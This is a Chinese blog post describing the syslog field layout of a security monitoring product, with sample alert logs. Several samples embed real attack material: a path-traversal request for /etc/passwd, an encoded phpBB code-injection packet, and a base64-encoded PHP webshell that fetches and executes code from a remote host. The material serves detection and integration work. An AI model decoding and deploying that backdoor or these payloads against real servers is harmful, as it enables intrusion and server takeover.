syslog格式说明
Posted tida-blogs
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了syslog格式说明相关的知识,希望对你有一定的参考价值。
1 告警日志
1.1.1 字段说明
| 字段名称 | 字段含义 |
| access_time | 告警时间 |
| alarm_sip | 受害ip |
| attack_org | 攻击组织 |
| attack_sip | 攻击ip |
| attack_type | 攻击类型 |
| file_md5 | 文件md5 |
| file_name | 文件名 |
| hazard_level | 威胁级别 |
| host | 域名 |
| host_md5 | 域名md5 |
| ioc | ioc |
| nid | nid |
| rule_key | 规则类型 |
| serial_num | 联动设备序列号 |
| skyeye_type | 原始日志类型 |
| type | 告警二级分类 |
| super_type | 告警一级分类 |
| type_chain | 告警子类标签编码 |
| host_state | 攻击结果 |
| confidence | 确信度 |
| vuln_type | 威胁名称 |
| attack_chain | 攻击链标签二级编号 |
| super_attack_chain | 攻击链标签一级编号 |
| is_web_attack | 是否web攻击 |
1.1.2 字典类型字段说明
hazard_level威胁级别:
| 1、2、3 | 低危 |
| 4、5 | 中危 |
| 6、7 | 高危 |
| 8、9、10 | 危急 |
1.1.3 范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2018-04-23 15:16:37|!172.17.20.159|!alarm|!{"attack_type": "", "first_access_time": "2018-04-18T11:05:07.000+0800", "ioc": "3306", "access_time": "2018-04-18T11:05:07.000+0800", "alarm_sip": "63.3.5.7", "nid": "17298326168730075144", "attack_sip": "11.1.1.18", "hazard_level": 7, "super_type": "攻击利用", "type": "自定义情报告警", "sip_ioc_dip": "31d51ab43633a6d4f5ef926a856dddd8"}
发送时间 客户端IP 日志类型 日志
2018-04-23 15:16:37|!172.17.20.159|!alarm|!{"attack_type": "", "first_access_time": "2018-04-18T11:05:07.000+0800", "ioc": "3306", "access_time": "2018-04-18T11:05:07.000+0800", "alarm_sip": "63.3.5.7", "nid": "17298326168730075144", "attack_sip": "11.1.1.18", "hazard_level": 7, "super_type": "攻击利用", "type": "自定义情报告警", "sip_ioc_dip": "31d51ab43633a6d4f5ef926a856dddd8"}
1.2 系统日志
1.2.1 字段说明
| 字段名称 | 字段含义 |
| name | 警告内容 |
| value | 当前值 |
1.2.2 范例
发送syslog的格式为 : (facility = local3,日志级别为:info)
发送时间 客户端IP 日志类型 日志
2018-05-14 15:10:52|!10.91.4.13|!log|![{"name": "空闲CPU百分比太低", "value": 19.7}, {"name": "15分钟平均CPU负载太高", "value": 35.1}]
发送时间 客户端IP 日志类型 日志
2018-05-14 15:10:52|!10.91.4.13|!log|![{"name": "空闲CPU百分比太低", "value": 19.7}, {"name": "15分钟平均CPU负载太高", "value": 35.1}]
1.3 原始告警
1.3.1 字段说明
告警字段一:webids-webattack_dolog 网页漏洞利用
| 字段名称 | 字段含义 |
| attack_type | 攻击类型 |
| attack_type_all | 攻击类型(全) |
| referer | HTTP-来源 |
| file_name | 文件名 |
| agent | 代理 |
| victim | 受害者 |
| sport | 源端口 |
| rsp_status | 相应状态 |
| sip | 源IP |
| severity | 危害级别 |
| rsp_body_len | 相应体长度 |
| serial_num | 采集设备序列号 |
| rsp_content_type | 响应内容类型 |
| parameter | HTTP请求参数 |
| method | 攻击方法 |
| req_body | 请求体 |
| req_header | 请求头 |
| rule_name | 规则名称 |
| host | 域名 |
| cookie | cookie |
| write_date | 写入时间 |
| attacker | 攻击者 |
| victim_type | 受攻击者类型 |
| attack_flag | 攻击标识 |
| uri | URI |
| rsp_content_length | 响应内容长度 |
| rule_version | 规则版本 |
| rsp_body | 响应体 |
| rsp_header | 响应头 |
| dport | 目的端口 |
| dolog_count | 告警次数 |
| dip | 目的IP |
| rule_id | 规则ID |
| confidence | 确信度 |
| detail_info | 告警详细信息 |
| solution | 解决方案 |
| vuln_desc | 攻击描述 |
| vuln_harm | 攻击危害 |
| vuln_name | 威胁名称 |
| vuln_type | 威胁类型 |
| webrules_tag | web攻击类规则标签 |
| public_date | 发布时间 |
| code_language | 使用语言 |
| site_app | 建站app |
| kill_chain | 攻击链 |
| kill_chain_all | 攻击链(全) |
| instranet_rule_all | 内部网络规则 |
| attack_result | 攻击结果 |
| xff | xff代理 |
告警字段二:webids-webshell_dolog webshell上传
| 字段名称 | 字段含义 |
| attack_type | 攻击类型 |
| attack_type_all | 攻击类型(全) |
| attack_flag | 攻击标识 |
| sip | 源IP |
| write_date | 写入时间 |
| victim | 受害者 |
| file_dir | 文件目录 |
| url | URL |
| victim_type | 受攻击者类型 |
| file_md5 | 附件MD5 |
| serial_num | 采集设备序列号 |
| attacker | 攻击者 |
| host | 域名 |
| file | 文件 |
| dport | 目的端口 |
| sport | 源端口 |
| dip | 目的IP |
| rule_ip | 规则ID |
| severity | 危害级别 |
| confidence | 确信度 |
| detail_info | 告警详细信息 |
| attack_desc | 攻击描述 |
| attack_harm | 攻击危害 |
| rule_name | 规则名称 |
| kill_chain | 攻击链 |
| kill_chain_all | 攻击链(全) |
| attack_result | 攻击结果 |
| xff | xff代理 |
告警字段三:webids_ids_dolog 网络攻击
| 字段名称 | 字段含义 |
| attack_type | 攻击类型 |
| attack_type_all | 攻击类型(全) |
| dip | 目的IP |
| packet_data | 载荷内容 |
| victim | 受害者 |
| sport | 源端口 |
| affected_system | 影响的系统 |
| sip | 源IP |
| severity | 危害级别 |
| detail_info | 告警详细信息 |
| attacker | 攻击者 |
| packet_size | 载荷大小 |
| info_id | 漏洞编号 |
| description | 网络攻击描述 |
| sig_id | 特征编号 |
| rule_name | 规则名称 |
| write_date | 写入时间 |
| protocol_id | 网络攻击协议 |
| attack_method | 攻击方法 |
| attcak_flag | 攻击标志 |
| rule_id | 规则ID |
| serial_num | 采集设备序列号 |
| appid | 应用ID |
| dport | 目的端口 |
| vuln_type | 威胁类型 |
| victim_type | 受攻击者类型 |
| bulletin | 解决方案 |
| confidence | 确信度 |
| webrules_tag | web攻击类规则标签 |
| ids_rule_version | IDS规则版本号 |
| cnnvd_id | CNNVD编号 |
| kill_chain | 攻击链 |
| kill_chain_all | 攻击链(全) |
| instranet_rule_all | 内部网络规则 |
| attack_result | 攻击结果 |
| xff | xff代理 |
告警字段四:webids_ioc_dolog 威胁情报
| 字段名称 | 字段含义 |
| access_time | 日志产生时间 |
| tid | 恶意家族ID |
| type | 恶意事件类型 |
| rule_desc | 规则详情 |
| offence_type | 关注类型 |
| offence_value | 关注内容 |
| sip | 源IP |
| dip | 目的IP |
| serverity | 危害级别 |
| serial_num | 采集设备序列号 |
| rule_state | 规则状态 |
| ioc_type | 规则类型 |
| ioc_value | 规则内容 |
| nid | IOCw唯一编号 |
| etime | 结束时间 |
| malicious_type | 威胁类型 |
| kill_chain | 攻击链 |
| kill_chain_all | 攻击链(全) |
| xml_confidence | 确信度 |
| malicious_family | 恶意家族 |
| campaign | 攻击时间/团伙 |
| targeted | 定向攻击 |
| tag | 恶意家族标签 |
| paltform | 影响平台 |
| current_status | 当前状态 |
| packed_data | 载荷内容 |
| ioc_source | 威胁情报源 |
| sport | 源端口 |
| dport | 目的端口 |
| proto | 协议 |
| dns_type | DNS类型 |
| filename | 文件名称 |
| file_md5 | 文件MD5 |
| desc | 描述 |
| file_direction | 文件传输方向 |
| host | 域名 |
| uri | URL |
| dns_arecord | DNS记录 |
| tproto | 传输层协议 |
| file_content | 文件内容 |
| attack_ip | 攻击IP |
| victim_ip | 受害IP |
| attack_type | 攻击类型 |
| attack_type_all | 攻击类型(全) |
| xff | xff代理 |
1.3.2 字典类型字段说明
hazard_rating威胁级别:
| 1、2、3 | 低危 |
| 4、5 | 中危 |
| 6、7 | 高危 |
| 8、9、10 | 危急 |
host_state告警结果:
| 0 | 企图 |
| 1 | 攻击成功 |
| 2 | 失陷 |
1.3.3 范例
webids-ioc_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT组织活动事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服务器连接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活动详情 APT 17是在2015年8月被FireEye公开揭露出来的一个 APT组织,最早的活动可以追溯到2013年。相关行动的主要细节如下: 使用的攻击方式:水坑 涉及行业:日本软件公司 受影响国家:日本 相关 技术: 1、使用的远控木马为:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。 2、该组织通过窃取日本软件公司的证书然后给恶意软件签名,诱使目标下载安装BLACKOFFICE后门。 3、其他别名:Deputy Dog、Aurora Panda。 参考链接: http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html ", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:47|!10.91.4.198|!webids-ioc_dolog|!{"rule_desc": "APT17 APT组织活动事件", "campaign": "APT17", "@timestamp": "2019-08-15T17:00:07.946+0800", "packet_data": "AJALLmC1AFBWogIqCABFAABAh5tAAEARxOUKBQAd3wUFBaEjADUALHr7l9Q BAAABAAAAAAAAA2FsaQpibGFua2NoYWlyA2NvbQAAAQAB", "dns_arecord": "", "tproto": "udp", "host_reraw": "com.blankchair.ali", "sport": 41251, "host_raw": "ali.blankchair.com", "attack_ip": "", "ioc_type": "host", "etime": "2017-03-08 13:33:11", "attack_type": "APT事件", "sip": "10.5.0.29","severity": 9, "proto": "dns", "kill_chain_all": "命令控制:0x03000000|命令 控制服务器连接:0x030a0000", "filename": "", "serial_num": "QbJK/cNEg", "dns_type": 0, "rule_state": "green", "tid": 1, "attack_type_all": "APT事件:10000000|APT事件:10010000", "type": "KNOWN APT", "uri_md5": "d41d8cd98f00b204e9800998ecf8427e", "targeted": true, "access_time": 1565859693000, "nid": "1161928703861588190","file_md5": "", "kill_chain": "c2", "offence_value": "10.5.0.29", "host": "ali.blankchair.com", "victim_ip": "10.5.0.29", "malicious_family": "Unknown", "geo_dip": {"subdivision": "Zhejiang Sheng", "country_code2": "CN", "longitude": "120.1614", "latitude": "30.2936", "continent_code": "AS", "city_name": "Hangzhou"}, "desc": "APT 17活动详情 APT 17是在2015年8月被FireEye公开揭露出来的一个 APT组织,最早的活动可以追溯到2013年。相关行动的主要细节如下: 使用的攻击方式:水坑 涉及行业:日本软件公司 受影响国家:日本 相关 技术: 1、使用的远控木马为:BLACKCOFFEE, WEBCnC, Joy RAT, PlugX。 2、该组织通过窃取日本软件公司的证书然后给恶意软件签名,诱使目标下载安装BLACKOFFICE后门。 3、其他别名:Deputy Dog、Aurora Panda。 参考链接: http://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html ", "xml_confidence": "high", "offence_type": "sip", "host_md5": "97419d43006658e6d6f3a6446ee83fa2", "@version": "6", "uri": "", "current_status": "inactive", "ioc_source": 0, "ioc_value": "ali.blankchair.com", "dport": 53, "dip": "223.5.5.5", "malicious_type": "APT事件"}
webids-ids_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphpOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代码执行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻击利用:16000000|代码执行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代码执行", "dip": "10.19.1.22", "rule_id": 2414}
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-ids_dolog|!{"intranet_rule_all": null, "ids_rule_version": "1.0", "cnnvd_id": "", "description": "1", "appid": 77, "packet_data": "UFeo1Lt/AAwphpOJCABFAAE7ewtAAEAGqGEKEwEVChMBFptiA FCb/E2ZyqJLgVAYAC4O7QAAR0VUIC92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2NCU2OSU 3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JT U0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJ TI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50 OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS41KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAx Mzg5KQ0KSG9zdDogd3d3LjM2MC5jbg0KDQo=", "xff": null, "kill_chain": "0x02010000", "rule_name": "phpBB Viewtopic.PHP PHP Highlight Script Injection Vulnerability", "webrules_tag": "1", "attack_result": "0", "victim": "10.19.1.22", "dport": 80, "bulletin": "", "sport": 39778, "affected_system": "", "attack_type": "代码执行", "confidence": 50, "sip": "10.19.1.21", "severity": 6, "protocol_id": 6, "attack_method": "", "attack_flag": "true", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "phpBB 2.x versions prior to version 2.0.11 are prone to a script injection vulnerability while parsing certain crafted HTTP requests. The vulnerability is due to the lack of proper checks on highlights in the HTTP request, allowing for a remote code execution. An attacker could exploit the vulnerability by sending a crafted HTTP request. A successful attack could lead to a remote code execution with the privileges of the server.
Reference:http://marc.theaimsgroup.com/?l=bugtraq&m=110029415208724&w=2, http://marc.theaimsgroup.com/?t=110079440800004&r=1&w=2,http://marc.theaimsgroup.com/?l=bugtraq&m=110365752909029&w=2, http://marc.theaimsgroup.com/?l=bugtraq&m=110143995118428&w=2,http://www.us-cert.gov/cas/techalerts/TA04-356A.html, http://www.kb.cert.org/vuls/id/497400,http://secunia.com/advisories/13239/,http://xforce.iss.net/xforce/xfdb/18052", "attacker": "10.19.1.21", "packet_size": 329, "info_id": "9506", "attack_type_all": "攻击利用:16000000|代码执行:16030000", "serial_num": "QbJK/cNEg", "sig_id": 33590712, "write_date": 1565857707, "victim_type": "server", "vuln_type": "代码执行", "dip": "10.19.1.22", "rule_id": 2414}
webids-webattack_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "对此类敏感请求进行拦截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默认配置不当", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "侦察:0x01000000|信息泄露:0x01020000", "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "发现尝试请求Linux下敏感文件", "vuln_harm": "此类请求行为一旦成功, 攻击者可通过访问敏感信息实施进一步的攻击。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1 Referer: http://www.baidu.com:80/ Cookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1 Host: www.baidu.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* ", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "发现尝试请求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其他", "site_app": "其他", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "发现在 HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "rule_version": 1, "attack_type_all": "攻击利用:16000000|配置不当/错误:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默认配置不当", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:45|!10.91.4.198|!webids-webattack_dolog|!{"webrules_tag": "1", "referer": " http://www.baidu.com:80/", "file_name": "", "@timestamp": "2019-08-15T16:33:07.619+0800", "agent": "", "solution": "对此类敏感请求进行拦截。", "host_reraw": "com.baidu.www", "attack_result": "0", "victim": "10.19.1.23", "sport": 57400, "attack_type": "默认配置不当", "rsp_status": 0, "sip": "10.19.1.22", "severity": 6, "rsp_body_len": 0, "public_date": "2018-08-30 16:27:11", "kill_chain_all": "侦察:0x01000000|信息泄露:0x01020000", "detail_info": "发现在HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "serial_num": "QbJK/cNEg", "rsp_content_type": "", "vuln_name": "发现尝试请求Linux下敏感文件", "vuln_harm": "此类请求行为一旦成功, 攻击者可通过访问敏感信息实施进一步的攻击。", "parameter": "cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "method": "GET", "req_body": "", "uri_md5": "3167e39c45796fff2ec661320c219333", "req_header": "GET /s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1 HTTP/1.1 Referer: http://www.baidu.com:80/ Cookie: BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24 FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1 Host: www.baidu.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* ", "confidence": 50, "kill_chain": "0x01020000", "rule_name": "发现尝试请求Linux下敏感文件", "host": "www.baidu.com", "cookie": " BAIDUID=C97B192DE3AF2C166FC837A952E1FB47:FG=1; BDSVRTM=9; H_PS_PSSID=4392_1427_4261_4897_4760_4677; BD_CK_SAM=1; BDRCVFR[yddw7FPe_pC]=I67x6TjHwwYf0; BDSFRCVID=vFAsJeCCxG0PZ3nCzm2M8f3dpNmwn80nQT0m3J; H_BDCLCKID_SF=tRk8oItMJCvqKRopMtOhq4tehH4qQhReWDTm5-nTtUJAhnrJ24FKqqkl-to80-rfaJ-jWfjmtnC5OCFljTu2D5O0eU_X5to05TIX3b7Ef-QPEtO_bfbT2MbQ0bCe2fJEaRruVnLb5PJFDt3ke53_0q3QhHbZqtJHKbDtoD-KJfK; NOJS=1", "@version": "6", "write_date": 1565858082, "code_language": "其他", "site_app": "其他", "host_md5": "dab19e82e1f9a681ee73346d3e7a575e", "attacker": "10.19.1.22", "victim_type": "server", "attack_flag": "true", "uri": "/s?cl=../../../../../../../../../../etc/passwd&rn=20&rtt=2&tn=baiduwb&wd=win8.1", "rsp_content_length": 0, "vuln_desc": "发现在 HTTP请求中发现试图访问Linux下敏感文件的疑似攻击行为。", "rule_version": 1, "attack_type_all": "攻击利用:16000000|配置不当/错误:160C0000", "rsp_body": "", "rsp_header": "", "dport": 80, "dolog_count": 1, "vuln_type": "默认配置不当", "dip": "10.19.1.23", "rule_id": 268567921, "host_raw": "www.baidu.com"}
webids-webshell_dolog范例
发送syslog的格式为 : (facility = local3,日志级别为:warning)
发送时间 客户端IP 日志类型 日志
2019-08-15 17:50:46|!10.91.4.198|!webids-webshell_dolog|!{"file": "PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCnNlc3Npb25fc3RhcnQoKTsNCmhlYWRlcigiQ29 udGVudC10eXBlOnRleHQvaHRtbDtjaGFyc2V0PWdiayIpOw0KJHBhc3N3b3JkID0gInB1an llaDRpZmxpdWV2bSI7IA0KaWYoZW1wdHkoJF9TRVNTSU9OWydhcGkxMjM0J10pKSANCgkkX1 NFU1NJT05bJ2FwaTEyMzQnXT1maWxlX2dldF9jb250ZW50cyhzcHJpbnRmKCclcz8lcycscGF jaygiSCoiLCc2ODc0NzQ3MDNBMkYyRjMxMzIzMzJFMzEzMjM1MkUzMTMxMzQyRTM4MzIyRjZBN zg2NjYyNzU2MzZCNjU3NDMyMzAzMTM0MzEyRjY4NjE2MzZCMkYzMTJFNkE3MDY3JyksdW5pcWlkK CkpKTsNCmlmKHN0cmlwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCdiYWlkdScpKzA9 PTApIGV4aXQ7DQppZihzdHJpcG9zKCRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwnbXljY 3MnKSswPT0wKSBleGl0OwkNCigkYjRkYm95ID0gZ3p1bmNvbXByZXNzKCRfU0VTU0lPTlsnYXBpM TIzNCddKSkgJiYgQHByZWdfcmVwbGFjZSgnL2FkL2UnLCdAJy5zdHJfcm90MTMoJ3JpbnknKS4nKC RiNGRib3kpJywgJ2FkZCcpOw0KPz4=", "@timestamp": "2019-08-15T16:28:14.421+0800", "host_reraw": "171:8081.66.16.10","attack_result": "0", "victim": "10.16.66.171", "sport": 45299, "attack_type": "加密后门", "confidence": 80, "sip": "192.168.61.133", "severity": 8, "file_dir": "upload", "kill_chain_all": "入侵:0x02000000|漏洞探测:0x02010000", "detail_info": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过安全性控制而获取对程序或 系统访问权的程序。该后门文件在调用>某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数, 比如base64_decode/create_function/chr等,具有后门的显著特征,可实现对服务器的操作和控制。", "serial_num": "QbJK/cNEg", "attack_harm": "服务器被植入后门程序后可能导致以下后果: 1.整个网站或者服务器被黑客控制,变成傀儡主机;2.核心数据被窃取,造成用户信息泄露。", "file_md5": "55c1a4fee7821c8689dc4fd895f593ed", "kill_chain": "0x02010000", "attacker": "192.168.61.133", "host": "10.16.66.171:8081", "@version": "6", "write_date": 1565857831, "attack_desc": "攻击者企图上传一个后门文件。后门程序一般是指那些绕过>安全性控制而获取对程序或系统访问权的程序。 该后门文件在调用某些PHP函数后会输出一段代码,该代码中含有一些高度危险的函数,比如base64_decode/create_function/chr等, 具有后门的显著特征,可实现对>服务器的操作和控制。", "host_md5": "28713b58235ab268378f0af86cecaa64", "rule_name": "加密后门.B", "url": "/upload/upload.php", "dip": "10.16.66.171", "attack_flag": "true", "webrules_tag": "1", "attack_type_all": "攻击利用:16000000|webshell上传:161C0000", "dport": 8081, "victim_type": "server", "rule_id": 10027, "host_raw": "10.16.66.171:8081"}
发送时间 客户端IP 日志类型 日志
